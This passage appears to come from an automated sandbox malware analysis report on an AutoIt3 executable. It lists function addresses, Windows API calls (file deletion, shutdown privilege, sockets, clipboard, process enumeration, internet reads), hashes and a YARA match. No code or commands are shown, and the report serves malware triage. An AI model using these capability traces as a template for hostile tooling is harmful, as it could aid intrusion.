                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: ddd547c40d700566e469c3b69f97a74704681796631378dfefef4638f03184d1
                                      • Instruction ID: 880a0f9fcf1a3548920549892c0655a3ca1f9695d52b546ea435a1fc191563ab
                                      • Opcode Fuzzy Hash: ddd547c40d700566e469c3b69f97a74704681796631378dfefef4638f03184d1
                                      • Instruction Fuzzy Hash: 8641EA305047CA5DFF319764C8083B7BEA0FB61304F09415AD6C6D62C2EB9499D4CFAA
                                      Function 0086443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 00864451
                                      • __swprintf.LIBCMT ref: 0086445E
                                        • Part of subcall function 008238C8: __woutput_l.LIBCMT ref: 00823921
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00864488
                                      • LoadResource.KERNEL32(?,00000000), ref: 00864494
                                      • LockResource.KERNEL32(00000000), ref: 008644A1
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 008644C1
                                      • LoadResource.KERNEL32(?,00000000), ref: 008644D3
                                      • SizeofResource.KERNEL32(?,00000000), ref: 008644E2
                                      • LockResource.KERNEL32(?), ref: 008644EE
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0086454F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                      • String ID:
                                      • API String ID: 1433390588-0
                                      • Opcode ID: 6fd7a7b72a081b1598fab081269fcc0c429479037085de00e6fc849d5f400c4d
                                      • Instruction ID: 5f613b89cb2cee6e89cb819790962c15738379c6b6dabb1012e0c6aa98cb04b8
                                      • Opcode Fuzzy Hash: 6fd7a7b72a081b1598fab081269fcc0c429479037085de00e6fc849d5f400c4d
                                      • Instruction Fuzzy Hash: 69318D7160121AAFDB12AFA0EC59EBF7BB9FF04301F054426F916D6150EB74DA21CBA4
                                      Function 00874830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 640bcfa14b22063de205e8767e8deccfbb16885a21f6307a4f3a680e52922b4d
                                      • Instruction ID: feec844be483af9a111a1b0d7e0fe56ba380ee0aa376e87e9d6e91e3b36ddc15
                                      • Opcode Fuzzy Hash: 640bcfa14b22063de205e8767e8deccfbb16885a21f6307a4f3a680e52922b4d
                                      • Instruction Fuzzy Hash: C62171312452159FDB12AF64EC49B2E7BA8FF54721F04C016FA0ADB2A1DB70ED008F56
                                      Function 00863CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                        • Part of subcall function 00864FEC: GetFileAttributesW.KERNEL32(?,00863BFE), ref: 00864FED
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00863D96
                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00863E3E
                                      • MoveFileW.KERNEL32(?,?), ref: 00863E51
                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00863E6E
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00863E90
                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00863EAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 4002782344-1173974218
                                      • Opcode ID: 929fa54b37b4d34d4e4704068cabb5e054ff04349b046ed9eb08556e4bccac74
                                      • Instruction ID: 8efae59b048e459bdd0ad0f17aa96d8ae29ddc2f837b56b99b77402d83accc69
                                      • Opcode Fuzzy Hash: 929fa54b37b4d34d4e4704068cabb5e054ff04349b046ed9eb08556e4bccac74
                                      • Instruction Fuzzy Hash: F8518A3180110DAACF15EBA4CA969EDB779FF10300F600169E502F6192EB316F49CBA2
                                      Function 0086FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0086FA83
                                      • FindClose.KERNEL32(00000000), ref: 0086FB96
                                        • Part of subcall function 008052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008052E6
                                      • Sleep.KERNEL32(0000000A), ref: 0086FAB3
                                      • _wcscmp.LIBCMT ref: 0086FAC7
                                      • _wcscmp.LIBCMT ref: 0086FAE2
                                      • FindNextFileW.KERNEL32(?,?), ref: 0086FB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                      • String ID: *.*
                                      • API String ID: 2185952417-438819550
                                      • Opcode ID: 008b70dc71c586999b7ee841be808b6bb677d29fd7e4362e5235e7a9fd06df81
                                      • Instruction ID: 28c5ad0657406714a35594a7092a3e00c0f0c0857a8c1f5e22111e1f7301aa15
                                      • Opcode Fuzzy Hash: 008b70dc71c586999b7ee841be808b6bb677d29fd7e4362e5235e7a9fd06df81
                                      • Instruction Fuzzy Hash: 4141707190021AAFDF14DFA4DC59AEEBBB8FF05351F144166E914E2291EB30DA84CF91
                                      Function 00864005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                        • Part of subcall function 00864FEC: GetFileAttributesW.KERNEL32(?,00863BFE), ref: 00864FED
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086407C
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 008640CC
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008640DD
                                      • FindClose.KERNEL32(00000000), ref: 008640F4
                                      • FindClose.KERNEL32(00000000), ref: 008640FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 2649000838-1173974218
                                      • Opcode ID: 5ffd9aaa64d0951db8c3f7dd619b13c04c10efb9904e3599af9f7e10339993a2
                                      • Instruction ID: 85e61887e703863aa0b0c3d393738cf12e6a7ab11cd6e4ddff5560f243701ffb
                                      • Opcode Fuzzy Hash: 5ffd9aaa64d0951db8c3f7dd619b13c04c10efb9904e3599af9f7e10339993a2
                                      • Instruction Fuzzy Hash: 7B317E310083559FC641EB64D8958EFB7ECFE95304F440A2EF5E1C2192DB209A49CBA3
                                      Function 00865778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00859399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008593E3
                                        • Part of subcall function 00859399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00859410
                                        • Part of subcall function 00859399: GetLastError.KERNEL32 ref: 0085941D
                                      • ExitWindowsEx.USER32(?,00000000), ref: 008657B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: e010e19bfe285f7db44c9f3c91ac11c020047ae43ba1e62e88917c2d00c60419
                                      • Instruction ID: 555c60ffbe445fc0ce4d12c507f70312e8fbba676e3fb0428478674e16ab4d8c
                                      • Opcode Fuzzy Hash: e010e19bfe285f7db44c9f3c91ac11c020047ae43ba1e62e88917c2d00c60419
                                      • Instruction Fuzzy Hash: DD014931750716EFE72867A8EC8BFBB729CFB04745F26012AFC63E21D2EA505C008564
                                      Function 0087696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008769C7
                                      • WSAGetLastError.WSOCK32(00000000), ref: 008769D6
                                      • bind.WSOCK32(00000000,?,00000010), ref: 008769F2
                                      • listen.WSOCK32(00000000,00000005), ref: 00876A01
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876A1B
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00876A2F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 7569041b2082b9404a99e8bca853f8c8554e3d3c0b09d1b3cf4f2466171aae2f
                                      • Instruction ID: de1d7d3f9b254753ac905cda153982a7067c50301112c1839c2bd662e9d794ad
                                      • Opcode Fuzzy Hash: 7569041b2082b9404a99e8bca853f8c8554e3d3c0b09d1b3cf4f2466171aae2f
                                      • Instruction Fuzzy Hash: 8521BB71200A15AFCB00EF68CC89A6EB7B9FF44720F148159E91AE73D1DB70EC018B92
                                      Function 0086C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086C329
                                      • _wcscmp.LIBCMT ref: 0086C359
                                      • _wcscmp.LIBCMT ref: 0086C36E
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086C37F
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0086C3AF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                      • String ID:
                                      • API String ID: 2387731787-0
                                      • Opcode ID: 114c4cec616e51e307e927c4be312040e57808d9fd9744991bad609b76bb1bf3
                                      • Instruction ID: 4fd821abbd9eb54f9998f6a6607f12fc84176944b3f7cf5d27c45926c4890b37
                                      • Opcode Fuzzy Hash: 114c4cec616e51e307e927c4be312040e57808d9fd9744991bad609b76bb1bf3
                                      • Instruction Fuzzy Hash: 7A51AB756046028FD714DF68D490EAAB3E8FF49314F11861EE99AC73A1DB30ED04CB92
                                      Function 00876E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00878475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008784A0
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00876E89
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876EB2
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00876EEB
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876EF8
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00876F0C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 99427753-0
                                      • Opcode ID: 21f5b09f2baddf8ecaf28e80a1d9d17c8e27416b905ee6a65863e522ad106e0c
                                      • Instruction ID: a04cd021b157ba874e952ff7f4861089c8367dc057cc4297df2573fccb5eee28
                                      • Opcode Fuzzy Hash: 21f5b09f2baddf8ecaf28e80a1d9d17c8e27416b905ee6a65863e522ad106e0c
                                      • Instruction Fuzzy Hash: 2541B4B5740614AFDB50AF689C87F7E73A8FB44714F048458FA09EB3D2DA709D008BA2
                                      Function 008859B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 9ddea336d49914fda23bf73f18eede0eec570177aa4301011795987887a5f2b7
                                      • Instruction ID: 258dd149c062b7b941c6fa1d7c33526778c3ed9b75bdfcb64caab871a09f26b4
                                      • Opcode Fuzzy Hash: 9ddea336d49914fda23bf73f18eede0eec570177aa4301011795987887a5f2b7
                                      • Instruction Fuzzy Hash: EE11C472340A229FE7217F6A9C84A2E7B99FF44761B05412AF846D7241DB30DD018BA1
                                      Function 0086C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0086CA75
                                      • CoCreateInstance.OLE32(00893D3C,00000000,00000001,00893BAC,?), ref: 0086CA8D
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • CoUninitialize.OLE32 ref: 0086CCFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                      • String ID: .lnk
                                      • API String ID: 2683427295-24824748
                                      • Opcode ID: fb6686dc451b74f3bf788428ca3ac3881be38439ea09b32c2cf39864c077e488
                                      • Instruction ID: bad6923ac109abd058d918b24124581d9ff798456c907c1bb0a63397ba402ffa
                                      • Opcode Fuzzy Hash: fb6686dc451b74f3bf788428ca3ac3881be38439ea09b32c2cf39864c077e488
                                      • Instruction Fuzzy Hash: 4AA129B1244205AFD700EF68DC81EABB7ACFF94754F004918F655D7292EB70AA49CB92
                                      Function 0087C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0084027A,?), ref: 0087C6E7
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0087C6F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 14ffc15b8d7606a3594de0614ce455890dc6112914ee03b033e3a10da9ef0779
                                      • Instruction ID: d75c8952bc5610a9c21374015e0816286111e64235a893e65f941e815238d5c9
                                      • Opcode Fuzzy Hash: 14ffc15b8d7606a3594de0614ce455890dc6112914ee03b033e3a10da9ef0779
                                      • Instruction Fuzzy Hash: E0E0C2785003028FD7206B6DCC49A5276D4FF04384B44C42EE8B9C3310EBB4C8808F10
                                      Function 00840030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      • Opcode ID: a00f9d61d495d57f82e2f8ff0e74930a0c8eea6fd079e081e3ac1ebc528f5bfc
                                      • Instruction ID: bf484b4e899b2244fdf2b77df43c2b29a35d3444db990f84cc3d133f13f78287
                                      • Opcode Fuzzy Hash: a00f9d61d495d57f82e2f8ff0e74930a0c8eea6fd079e081e3ac1ebc528f5bfc
                                      • Instruction Fuzzy Hash: 46D0127281851CEAC7089B90CC55DFB737CFB04308F140452F646E2040D2399788AE22
                                      Function 00864148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0086416D
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0086417B
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0086419B
                                      • CloseHandle.KERNEL32(00000000), ref: 00864245
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 621946f8e2560560840e2ecf66b32dcc8237404e3901ee8067272bf13edac3cc
                                      • Instruction ID: 0ff4cb9c7fb92bb2f37816e5c9b0db27561a12179ab235ecb3c84e3a925244f7
                                      • Opcode Fuzzy Hash: 621946f8e2560560840e2ecf66b32dcc8237404e3901ee8067272bf13edac3cc
                                      • Instruction Fuzzy Hash: F831A0711083419FD700EF54D895AAFBBE8FF95350F14092EF685C22A1EB709A89CB93
                                      Function 03D1F314 Relevance: 4.8, APIs: 3, Instructions: 305fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,03D1F868,?,?,?,?,0000005D,00000000,00000000), ref: 03D1F39F
                                      • FindNextFileW.KERNEL32(?,?,00000000,03D1F706,?,00000000,?,00000000,03D1F868,?,?,?,?,0000005D,00000000,00000000), ref: 03D1F6DC
                                      • FindClose.KERNEL32(?,03D1F70D,03D1F706,?,00000000,?,00000000,03D1F868,?,?,?,?,0000005D,00000000,00000000), ref: 03D1F700
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 8d8cbbb34418b403adcf66e97b2f9cc6aa0ab2b0715d402326ac07a536817641
                                      • Instruction ID: 81005435185cfb775ab9d6984e34854e01032089a998d396dbf06680d4871055
                                      • Opcode Fuzzy Hash: 8d8cbbb34418b403adcf66e97b2f9cc6aa0ab2b0715d402326ac07a536817641
                                      • Instruction Fuzzy Hash: 2DD12A3891125E9BCB15FBA1DC94ADDB3B9EF44300F5285E9D408EB220DB70AE969F50
                                      Function 008729BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00872AAD
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00872AE4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
